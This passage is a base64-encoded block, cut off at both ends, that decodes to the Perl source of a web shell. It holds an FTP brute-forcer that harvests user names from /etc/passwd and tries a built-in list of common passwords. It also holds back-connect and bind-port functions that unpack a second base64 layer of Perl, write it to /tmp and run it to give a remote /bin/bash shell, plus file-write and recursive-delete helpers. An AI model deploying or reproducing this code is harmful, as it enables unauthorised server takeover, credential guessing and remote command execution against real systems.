gkNCgkkcmVzdWx0IC49ICZSdW5DbWQ7DQoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsNCgkkcmVzdWx0IC49ICAiPC9mb3JtPiI7DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQojIFNhdmUgRmlsZQ0KIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0Kc3ViIFNhdmVGaWxlKCQpDQp7DQoJbXkgJERhdGE9IHNoaWZ0IDsNCglteSAkRmlsZT0gc2hpZnQ7DQoJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuJEZpbGU7DQoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpDQoJew0KCQliaW5tb2RlIEZJTEU7DQoJCXByaW50IEZJTEUgJERhdGE7DQoJCWNsb3NlIEZJTEU7DQoJCXJldHVybiAxOw0KCX1lbHNlDQoJew0KCQlyZXR1cm4gMDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEJydXRlIEZvcmNlciBGb3JtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQnJ1dGVGb3JjZXJGb3JtDQp7DQoJbXkgJHJlc3VsdD0iIjsNCgkkcmVzdWx0IC49IDw8RU5EOw0KDQo8dGFibGU+DQoNCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBhbGlnbj0iY2VudGVyIj4NCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIzxicj4NClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJydXRlZm9yY2VyIi8+DQo8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD5Vc2VyOjxicj48dGV4dGFyZWEgcm93cz0iMTgiIGNvbHM9IjMwIiBuYW1lPSJ1c2VyIj4NCkVORA0KY2hvcCgkcmVzdWx0IC49IGBsZXNzIC9ldGMvcGFzc3dkIHwgY3V0IC1kOiAtZjFgKTsNCiRyZXN1bHQgLj0gPDwnRU5EJzsNCjwvdGV4dGFyZWE+PC90ZD4NCjx0ZD4NCg0KUGFzczo8YnI+DQo8dGV4dGFyZWEgcm93cz0iMTgiIGNvbHM9IjMwIiBuYW1lPSJwYXNzIj4xMjNwYXNzDQoxMjMhQCMNCjEyM2FkbWluDQoxMjNhYmMNCjEyMzQ1NmFkbWluDQoxMjM0NTU0MzIxDQoxMjM0NDMyMQ0KcGFzczEyMw0KYWRtaW4NCmFkbWluY3ANCmFkbWluaXN0cmF0b3INCm1hdGtoYXUNCnBhc3NhZG1pbg0KcEBzc3dvcmQNCnBAc3N3MHJkDQpwYXNzd29yZA0KMTIzNDU2DQoxMjM0NTY3DQoxMjM0NTY3OA0KMTIzNDU2Nzg5DQoxMjM0NTY3ODkwDQoxMTExMTENCjAwMDAwMA0KMjIyMjIyDQozMzMzMzMNCjQ0NDQ0NA0KNTU1NTU1DQo2NjY2NjYNCjc3Nzc3Nw0KODg4ODg4DQo5OTk5OTkNCjEyMzEyMw0KMjM0MjM0DQozNDUzNDUNCjQ1NjQ1Ng0KNTY3NTY3DQo2Nzg2NzgNCjc4OTc4OQ0KMTIzMzIxDQo0NTY2NTQNCjY1NDMyMQ0KNzY1NDMyMQ0KODc2NTQzMjENCjk4NzY1NDMyMQ0KMDk4NzY1NDMyMQ0KYWRtaW4xMjMNCmFkbWluMTIzNDU2DQphYmNkZWYNCmFiY2FiYw0KIUAjIUAjDQohQCMkJV4NCiFAIyQlXiYqKA0KIUAjJCQjQCENCmFiYzEyMw0KYW5oeWV1ZW0NCmlsb3ZleW91PC90ZXh0YXJlYT4NCjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPg0KU2xlZXA6PHNlbGVjdCBuYW1lPSJzbGVlcCI+DQoNCjxvcHRpb24+MDwvb3B0aW9uPg0KPG9wdGlvbj4xPC9vcHRpb24+DQo8b3B0aW9uPjI8L29wdGlvbj4NCg0KPG9wdGlvbj4zPC9vcHRpb24+DQo8L3NlbGVjdD4gDQo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPg0KPC9mb3JtPg0KPC90YWJsZT4NCkVORA0KcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEJydXRlIEZvcmNlcg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJydXRlRm9yY2VyDQp7DQoJbXkgJHJlc3VsdD0iIjsNCgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307DQoJaWYoJGlueyd1c2VyJ30gZXEgIiIpDQoJew0KCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07DQoJfWVsc2UNCgl7DQoJCXVzZSBOZXQ6OkZUUDsgDQoJCUB1c2VyPSBzcGxpdCgvXG4vLCAkaW57J3VzZXInfSk7DQoJCUBwYXNzPSBzcGxpdCgvXG4vLCAkaW57J3Bhc3MnfSk7DQoJCWNob21wKEB1c2VyKTsNCgkJY2hvbXAoQHBhc3MpOw0KCQkkcmVzdWx0IC49ICI8YnI+PGJyPlsrXSBUcnlpbmcgYnJ1dGUgJFNlcnZlck5hbWU8YnI+PT09PT09PT09PT09PT09PT09PT0+Pj4+Pj4+Pj4+Pj48PDw8PDw8PDw8PT09PT09PT09PT09PT09PT09PT08YnI+PGJyPlxuIjsNCgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQ0KCQl7DQoJCQlpZighKCR1c2VybmFtZSBlcSAiIikpDQoJCQl7DQoJCQkJZm9yZWFjaCAkcGFzc3dvcmQgKEBwYXNzKQ0KCQkJCXsNCgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgDQoJCQkJCWlmKCRmdHAtPmxvZ2luKCIkdXNlcm5hbWUiLCIkcGFzc3dvcmQiKSkNCgkJCQkJew0KCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7DQoJCQkJCQkkZnRwLT5xdWl0KCk7DQoJCQkJCQlicmVhazsNCgkJCQkJfQ0KCQkJCQlpZighKCRpbnsnc2xlZXAnfSBlcSAiMCIpKQ0KCQkJCQl7DQoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7DQoJCQkJCX0NCgkJCQkJJGZ0cC0+cXVpdCgpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBCYWNrY29ubmVjdCBGb3JtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmFja0JpbmRGb3JtDQp7DQoJcmV0dXJuIDw8RU5EOw0KCTxicj48YnI+DQoNCgk8dGFibGU+DQoJPHRyPg0KCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPg0KCTx0ZD4gSG9zdDogPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjIwIiBuYW1lPSJjbGllbnRhZGRyIiB2YWx1ZT0iJEVOVnsnUkVNT1RFX0FERFInfSI+DQoJIFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI3IiBuYW1lPSJjbGllbnRwb3J0IiB2YWx1ZT0iODAiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiYScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+PC90ZD4NCg0KCTx0ZD48aW5wdXQgbmFtZT0icyIgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJDb25uZWN0Ij48L3RkPg0KCTwvZm9ybT4NCgk8L3RyPg0KCTx0cj4NCgk8dGQgY29sc3Bhbj0zPjxmb250IGNvbG9yPSNGRkZGRkY+WytdIENsaWVudCBsaXN0ZW4gYmVmb3JlIGNvbm5lY3QgYmFjayENCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+DQoJPGJyPlsrXSBDbGllbnQgbGlzdGVuIHdpdGggY29tbWFuZDogPHJ1bj5uYyAtdnYgLWwgLXAgPHNwYW4gaWQ9ImJhIj44MDwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4NCg0KCTwvdHI+DQoJPC90YWJsZT4NCg0KCTxicj48YnI+DQoJPHRhYmxlPg0KCTx0cj4NCgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCgk8dGQ+QmluZCBQb3J0OiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYmFja2JpbmQiPjwvdGQ+DQoNCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+DQoNCgkgUGFzc3dvcmQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iYmluZHBhc3MiIHZhbHVlPSJUSElFVUdJQUJVT04iPjwvdGQ+DQoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+DQoJPC9mb3JtPg0KCTwvdHI+DQoJPHRyPg0KCTx0ZCBjb2xzcGFuPTM+PGZvbnQgY29sb3I9I0ZGRkZGRj5bK10gQ2h1YyBuYW5nIGNodWEgZGMgdGVzdCENCgk8YnI+WytdIFRyeSBjb21tYW5kOiA8cnVuPm5jICRFTlZ7J1NFUlZFUl9BRERSJ30gPHNwYW4gaWQ9ImJpIj4xNDEyPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPg0KDQoJPC90cj4NCgk8L3RhYmxlPjxicj4NCkVORA0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBCYWNrY29ubmVjdCB1c2UgcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJhY2tCaW5kDQp7DQoJdXNlIE1JTUU6OkJhc2U2NDsNCgl1c2UgU29ja2V0OwkNCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7DQoJJGJpbmRwZXJsPSJJeUV2ZFhOeUwySnBiaTl3WlhKc0RRcDFjMlVnVTI5amEyVjBPdzBLSkVGU1IwTTlRRUZTUjFZN0RRb2tjRzl5ZEFrOUlDUkJVa2RXV3pCZE93MEtKSEJ5YjNSdkNUMGdaMlYwY0hKdmRHOWllVzVoYldVb0ozUmpjQ2NwT3cwS0pGTm9aV3hzQ1QwZ0lpOWlhVzR2WW1GemFDSTdEUXB6YjJOclpYUW9VMFZTVmtWU0xDQlFSbDlKVGtWVUxDQlRUME5MWDFOVVVrVkJUU3dnSkhCeWIzUnZLVzl5SUdScFpTQWljMjlqYTJWME9pUWhJanNOQ25ObGRITnZZMnR2Y0hRb1UwVlNWa1ZTTENCVFQweGZVMDlEUzBWVUxDQlRUMTlTUlZWVFJVRkVSRklzSUhCaFkyc29JbXdpTENBeEtTbHZjaUJrYVdVZ0luTmxkSE52WTJ0dmNIUTZJQ1FoSWpzTkNtSnBibVFvVTBWU1ZrVlNMQ0J6YjJOcllXUmtjbDlwYmlna2NHOXlkQ3dnU1U1QlJFUlNYMEZPV1NrcGIzSWdaR2xsSUNKaWFXNWtPaUFrSVNJN0RRcHNhWE4wWlc0b1UwVlNWa1ZTTENCVFQwMUJXRU5QVGs0cENRbHZjaUJrYVdVZ0lteHBjM1JsYmpvZ0pDRWlPdzBLWm05eUtEc2dKSEJoWkdSeUlEMGdZV05qWlhCMEtFTk1TVVZPVkN3Z1UwVlNWa1ZTS1RzZ1kyeHZjMlVnUTB4SlJVNVVLUTBLZXcwS0NXOXdaVzRvVTFSRVNVNHNJQ0krSmtOTVNVVk9WQ0lwT3cwS0NXOXdaVzRvVTFSRVQxVlVMQ0FpUGlaRFRFbEZUbFFpS1RzTkNnbHZjR1Z1S0ZOVVJFVlNVaXdnSWo0bVEweEpSVTVVSWlrN0RRb0pjM2x6ZEdWdEtDSjFibk5sZENCSVNWTlVSa2xNUlRzZ2RXNXpaWFFnVTBGV1JVaEpVMVFnTzJWamFHOGdKMXNyWFNCVGVYTjBaVzFwYm1adk9pQW5PeUIxYm1GdFpTQXRZVHRsWTJodk8yVmphRzhnSjFzclhTQlZjMlZ5YVc1bWJ6b2dKenNnYVdRN1pXTm9ienRsWTJodklDZGJLMTBnUkdseVpXTjBiM0o1T2lBbk95QndkMlE3WldOb2J6c2daV05vYnlBbld5dGRJRk5vWld4c09pQW5PeVJUYUdWc2JDSXBPdzBLQ1dOc2IzTmxLRk5VUkVsT0tUc05DZ2xqYkc5elpTaFRWRVJQVlZRcE93MEtDV05zYjNObEtGTlVSRVZTVWlrN0RRcDlEUW89IjsNCg0KCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307DQoJJENsaWVudFBvcnQgPSBpbnQoJGlueydjbGllbnRwb3J0J30pOw0KCWlmKCRDbGllbnRQb3J0IGVxIDApDQoJew0KCQlyZXR1cm4gJkJhY2tCaW5kRm9ybTsNCgl9ZWxzaWYoISRDbGllbnRBZGRyIGVxICIiKQ0KCXsNCgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmFja3BlcmwpOw0KCQlpZigtdyAiL3RtcC8iKQ0KCQl7DQoJCQkkRmlsZT0iL3RtcC9iYWNrY29ubmVjdC5wbCI7CQ0KCQl9ZWxzZQ0KCQl7DQoJCQkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4iYmFja2Nvbm5lY3QucGwiOw0KCQl9DQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOw0KCQlwcmludCBGSUxFICREYXRhOw0KCQljbG9zZSBGSUxFOw0KCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsNCgkJdW5saW5rKCRGaWxlKTsNCgkJZXhpdCAwOw0KCX1lbHNlDQoJew0KCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiaW5kcGVybCk7DQoJCWlmKC13ICIvdG1wIikNCgkJew0KCQkJJEZpbGU9Ii90bXAvYmluZHBvcnQucGwiOwkNCgkJfWVsc2UNCgkJew0KCQkJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuImJpbmRwb3J0LnBsIjsNCgkJfQ0KCQlvcGVuKEZJTEUsICI+JEZpbGUiKTsNCgkJcHJpbnQgRklMRSAkRGF0YTsNCgkJY2xvc2UgRklMRTsNCgkJc3lzdGVtKCJwZXJsIGJpbmRwb3J0LnBsICRDbGllbnRQb3J0Iik7DQoJCXVubGluaygkRmlsZSk7DQoJCWV4aXQgMDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojICBBcnJheSBMaXN0IERpcmVjdG9yeQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJtRGlyKCQpIA0Kew0KCW15ICRkaXIgPSBzaGlmdDsNCiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkNCgl7DQoJCXdoaWxlKCRmaWxlID0gcmVhZGRpcihESVIpKQ0KCQl7DQoJCQlpZigoJGZpbGUgbmUgIi4iKSAmJiAoJGZpbGUgbmUgIi4uIikpDQoJCQl7DQoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7DQoJCQkJaWYoLWQgJGZpbGUpDQoJCQkJew0KCQkJCQkmUm1EaXIoJGZpbGUpOw0KCQkJCX0NCgkJCQllbHNlDQoJCQkJew0KCQkJCQl1bmxpbmsoJGZpbGUpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCQljbG9zZWRpcihESVIpOw0KCX0NCglpZighcm1kaXIoJGRpcikpDQoJew0KCQkNCgl9DQp9DQpzdWIgRmlsZU93bmVyKCQpDQp7DQoJbXkgJGZpbGUgPSBzaGlmdDsNCglpZigtZSAkZmlsZSkNCgl7DQoJCSgkdWlkLCRnaWQpID0gKHN0YXQoJGZpbGUpKVs0LDVdOw0KCQlpZigkV2luTlQpDQoJCXsNCgkJCXJldHVybiAiPz8/IjsNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOw0KCQkJJGdyb3VwPWdldGdyZ2lkKCRnaWQpOw0KCQkJcmV0dXJuICRuYW1lLiIvIi4kZ3JvdXA7DQoJCX0NCgl9DQoJcmV0dXJuICI/Pz8iOw0KfQ0Kc3ViIFBhcmVudEZvbGRlcigkKQ0Kew0KCW15ICRwYXRoID0gc2hpZnQ7DQoJbXkgJENvbW0gPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAuLiIuJENtZFNlcC4kQ21kUHdkOw0KCWNob3AoJHBhdGggPSBgJENvbW1gKTsNCglyZXR1cm4gJHBhdGg7DQp9DQpzdWIgRmlsZVBlcm1zKCQpDQp7DQoJbXkgJGZpbGUgPSBzaGlmdDsNCglteSAkdXIgPSAiLSI7DQoJbXkgJHV3ID0gIi0iOw0KCWlmKC1lICRmaWxlKQ0KCXsNCgkJaWYoJFdpbk5UKQ0KCQl7DQoJCQlpZigtciAkZmlsZSl7ICR1ciA9ICJyIjsgfQ0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0NCgkJCXJldHVybiAkdXIgLiAiIC8gIiAuICR1dzsNCgkJfWVsc2UNCgkJew0KCQkJJG1vZGU9KHN0YXQoJGZpbGUpKVsyXTsNCgkJCSRyZXN1bHQgPSBzcHJpbnRmKCIlMDRvIiwgJG1vZGUgJiAwNzc3Nyk7DQoJCQlyZXR1cm4gJHJlc3VsdDsNCgkJfQ0KCX0NCglyZXR1cm4gIjAwMDAiOw0KfQ0Kc3ViIEZpbGVMYXN0TW9kaWZpZWQoJCkNCnsNCglteSAkZmlsZSA9IHNoaWZ0Ow0KCWlmKC1lICRmaWxlKQ0KCXsNCgkJKCRsYSkgPSAoc3RhdCgkZmlsZSkpWzldOw0KCQkoJGQsJG0sJHksJGgsJGkpID0gKGxvY2FsdGltZSgkbGEpKVszLDQsNSwyLDFdOw0KCQkkeSA9ICR5ICsgMTkwMDsNCgkJQG1vbnRoID0gcXcvMSAyIDMgNCA1IDYgNyA4IDkgMTAgMTEgMTIvOw0KCQkkbG10aW1lID0gc3ByaW50ZigiJTAyZC8lcy8lNGQgJTAyZDolMDJkIiwkZCwkbW9udGhbJG1dLCR5LCRoLCRpKTsNCgkJcmV0dXJuICRsbXRpbWU7DQoJfQ0KCXJldHVybiAiPz8/IjsNCn0NCnN1YiBGaWxlU2l6ZSgkKQ0Kew0KCW15ICRmaWxlID0gc2hpZnQ7DQoJaWYoLWYgJGZpbGUpDQoJew0KCQlyZXR1cm4gLXMgJGZpbGU7DQoJfQ0KCXJldHVybiAiMCI7DQoNCn0NCnN1YiBQYXJzZUZpbGVTaXplKCQpDQp7DQoJbXkgJHNpemUgPSBzaGlmdDsNCglpZigkc2l6ZSA8PSAxMDI0KQ0KCXsNCgkJcmV0dXJuICRzaXplLiAiIEIiOw0KCX0NCgllbHNlDQoJew0KCQlpZigkc2l6ZSA8PSAxMDI0KjEwMjQpIA0KCQl7DQoJCQkkc2l6ZSA9IHNwcmludGYoIiUuMDJmIiwkc2l6ZSAvIDEwMjQpOw0KCQkJcmV0dXJuICRzaXplLiIgS0IiOw0KCQl9DQoJCWVsc2UgDQoJCXsNCgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7DQoJCQlyZXR1cm4gJHNpemUuIiBNQiI7DQoJCX0NCgl9DQp9DQpzdWIgdHJpbSgkKQ0Kew0KCW15ICRzdHJpbmcgPSBzaGlmdDsNCgkkc3RyaW5nID1+IHMvXlxzKy8vOw0KCSRzdHJpbmcgPX4gcy9ccyskLy87DQoJcmV0dXJuICRzdHJpbmc7DQp9DQpzdWIgQWRkU2xhc2hlcygkKQ0Kew0KCW15ICRzdHJpbmcgPSBzaGlmdDsNCgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7DQoJcmV0dXJuICRzdHJpbmc7DQp9DQpzdWIgTGlzdERpcg0Kew0KCW15ICRwYXRoID0gJEN1cnJlbnREaXIuJFBhdGhTZXA7DQoJJHBhdGg9fiBzL1xcXFwvXFwvZzsNCglteSAkcmVzdWx0ID0gIjxmb3JtIG5hbWU9J2YnIGFjdGlvbj0nJFNjcmlwdExvY2F0aW9uJz48c3BhbiBzdHlsZT0nZm9udDogMTFwdCBWZXJkYW5hOyBmb250LXdlaWdodDogYm9sZDsnPlBhdGg6IFsgIi4mQWRkTGlua0RpcigiZ3VpIikuIiBdIDwvc3Bhbj48aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0nZCcgc2l6ZT0nNDAnIHZhbHVlPSckQ3VycmVudERpcicgLz48aW5wdXQgdHlwZT0naGlkZGVuJyBuYW1lPSdhJyB2YWx1ZT0nZ3VpJz48aW5wdXQgY2xhc3M9J3N1Ym1pdCcgdHlwZT0nc3VibWl0JyB2YWx1ZT0nQ2hhbmdlJz48L2Zvcm0+IjsNCglpZigtZCAkcGF0aCkNCgl7DQoJCW15IEBmbmFtZSA9ICgpOw0KCQlteSBAZG5hbWUgPSAoKTsNCgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQ0KCQl7DQoJCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkNCgkJCXsNCgkJCQkkZj0kcGF0aC4kZmlsZTsNCgkJCQlpZigtZCAkZikNCgkJCQl7DQoJCQkJCXB1c2goQGRuYW1lLCRmaWxlKTsNCgkJCQl9DQoJCQkJZWxzZQ0KCQkJCXsNCgkJCQkJcHVzaChAZm5hbWUsJGZpbGUpOw0KCQkJCX0NCgkJCX0NCgkJCWNsb3NlZGlyKERJUik7DQoJCX0NCgkJQGZuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGZuYW1lOw0KCQlAZG5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZG5hbWU7DQoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4NCg0KCQk8dHIgc3R5bGU9J2JhY2tncm91bmQtY29sb3I6ICMzZTNlM2UnPjx0aD5GaWxlIE5hbWU8L3RoPg0KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4NCgkJPHRoIHN0eWxlPSd3aWR0aDoxNTBweDsnPk93bmVyPC90aD4NCgkJPHRoIHN0eWxlPSd3aWR0aDoxMDBweDsnPlBlcm1pc3Npb248L3RoPg0KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+DQoJCTx0aCBzdHlsZT0nd2lkdGg6MjYwcHg7Jz5BY3Rpb248L3RoPjwvdHI+IjsNCgkJbXkgJHN0eWxlPSJsaW5lIjsNCgkJbXkgJGk9MDsNCgkJZm9yZWFjaCBteSAkZCAoQGRuYW1lKQ0KCQl7DQoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOw0KCQkJJGQgPSAmdHJpbSgkZCk7DQoJCQkkZGlybmFtZT0kZDsNCgkJCWlmKCRkIGVxICIuLiIpIA0KCQkJew0KCQkJCSRkID0gJlBhcmVudEZvbGRlcigkcGF0aCk7DQoJCQl9DQoJCQllbHNpZigkZCBlcSAiLiIpIA0KCQkJew0KCQkJCSRkID0gJHBhdGg7DQoJCQl9DQoJCQllbHNlIA0KCQkJew0KCQkJCSRkID0gJHBhdGguJGQ7DQoJCQl9DQoJCQkkcmVzdWx0IC49ICI8dHIgY2